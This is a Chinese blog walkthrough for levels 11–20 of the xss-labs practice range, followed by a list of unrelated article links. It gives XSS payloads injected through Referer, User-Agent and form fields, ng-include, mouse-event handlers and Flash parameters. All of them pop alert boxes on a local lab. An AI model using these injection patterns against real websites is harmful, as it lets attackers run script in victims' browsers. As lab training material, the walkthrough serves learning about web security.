当前位置: 首页 > news >正文

xss-labs靶场通关详解

Less-11

1、使用burp suite抓包

2、在数据包中添加Referer='" type='text' οnclick='alert(123)'

3点击forward,页面出现搜索框,点击搜索框,即可出现弹窗

Less-12

1、使用burp suite抓包

2、将UA头写入点击事件'" type='text' οnclick='alert(123)'

 

3、点击forward,页面出现搜索框,点击搜索框,即可出现弹窗

Less-13

1、使用burp suite抓包

2、在user处写入点击事件'" type='text' οnclick='alert(123)'

3、点击forward,页面出现搜索框,点击搜索框,即可出现弹窗

Less-14

文件地址失效,无法进行测试

Less-15

1、查看页面源码,发现有一个被注释掉的nginclude信息2、使用ng-include引用外部html文件?src='./level1.php'

发现引入了第一关的php文件

3、点击f12  在图片标签里添加一个点击事件 οnclick='alert(1)'

当我们点击图片时 就会出现弹窗

Less-16

1、打开页面源代码

2、在src后添加οnclick="alert(1)" ,点击图片出现弹窗

Less-17

1、页面输入οnmοuseοver=javascript:alert(1),鼠标移到不支持此插件上

Less-18

1、页面输入οnmοuseοver=alert("1"),鼠标移到不支持此插件上

Less-19

1、本题需要使用flash插件

2、页面输入http://127.0.0.1/xss/level19.php?arg01=version&arg02=<a href="javascript:alert(/xss/)">xss</a>,访问后点击xss即可出现弹窗

Less-20

1、本题依旧需要flash插件

2、页面输入php?arg01=id&arg02=xss\"))}catch(e){alert(/xss/)}//%26width=123%26height=123

访问直接弹窗

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 【DSP+FPGA】基于DSP+FPGA XC7K325T与TMS320C6678的通用信号处理平台
  • 【软考】【多媒体应用设计师】媒体与技术2
  • useeffect和uselayout区别
  • HTTPS协议中的加密机制分析、证书认证
  • hadoop日志文件
  • Linux环境下的MySQL的卸载、安装与使用[以CentOS7为例说明]
  • Transformer模型 PostionEmbedding的实现
  • @RequestBody与@RequestParam:Spring MVC中的参数接收差异解析
  • WPF ToolkitMVVM IOC IServiceConllection
  • ssrf+redis未授权访问漏洞复现
  • 【SpringCloud应用框架】GateWay网关
  • 【AI绘画】Midjourney前置/imagine与单图指令详解
  • 【递归深搜之记忆化搜索算法】
  • 缓存解决方案。Redis 和 Amazon ElastiCache 比较
  • 力扣top300:3. 无重复字符的最长子串
  • es6
  • git 常用命令
  • JavaScript类型识别
  • JavaScript异步流程控制的前世今生
  • Protobuf3语言指南
  • React16时代,该用什么姿势写 React ?
  • scrapy学习之路4(itemloder的使用)
  • Spark学习笔记之相关记录
  • Sublime Text 2/3 绑定Eclipse快捷键
  • Web设计流程优化:网页效果图设计新思路
  • 为视图添加丝滑的水波纹
  • 一个SAP顾问在美国的这些年
  • 在 Chrome DevTools 中调试 JavaScript 入门
  • 栈实现走出迷宫(C++)
  • ​ssh免密码登录设置及问题总结
  • # Kafka_深入探秘者(2):kafka 生产者
  • #systemverilog# 之 event region 和 timeslot 仿真调度(十)高层次视角看仿真调度事件的发生
  • #我与Java虚拟机的故事#连载08:书读百遍其义自见
  • $(document).ready(function(){}), $().ready(function(){})和$(function(){})三者区别
  • (2009.11版)《网络管理员考试 考前冲刺预测卷及考点解析》复习重点
  • (4)(4.6) Triducer
  • (delphi11最新学习资料) Object Pascal 学习笔记---第5章第5节(delphi中的指针)
  • (八)光盘的挂载与解挂、挂载CentOS镜像、rpm安装软件详细学习笔记
  • (纯JS)图片裁剪
  • (第三期)书生大模型实战营——InternVL(冷笑话大师)部署微调实践
  • (二十六)Java 数据结构
  • (附源码)ssm高校实验室 毕业设计 800008
  • (免费领源码)Python#MySQL图书馆管理系统071718-计算机毕业设计项目选题推荐
  • (学习总结)STM32CubeMX HAL库 学习笔记撰写心得
  • (一) 初入MySQL 【认识和部署】
  • (一)【Jmeter】JDK及Jmeter的安装部署及简单配置
  • (转载)PyTorch代码规范最佳实践和样式指南
  • .net 获取url的方法
  • .Net的C#语言取月份数值对应的MonthName值
  • .NET开发人员必知的八个网站
  • .NET开源、简单、实用的数据库文档生成工具
  • /dev下添加设备节点的方法步骤(通过device_create)
  • :O)修改linux硬件时间
  • @TableLogic注解说明,以及对增删改查的影响
  • [ CTF ] WriteUp- 2022年第三届“网鼎杯”网络安全大赛(白虎组)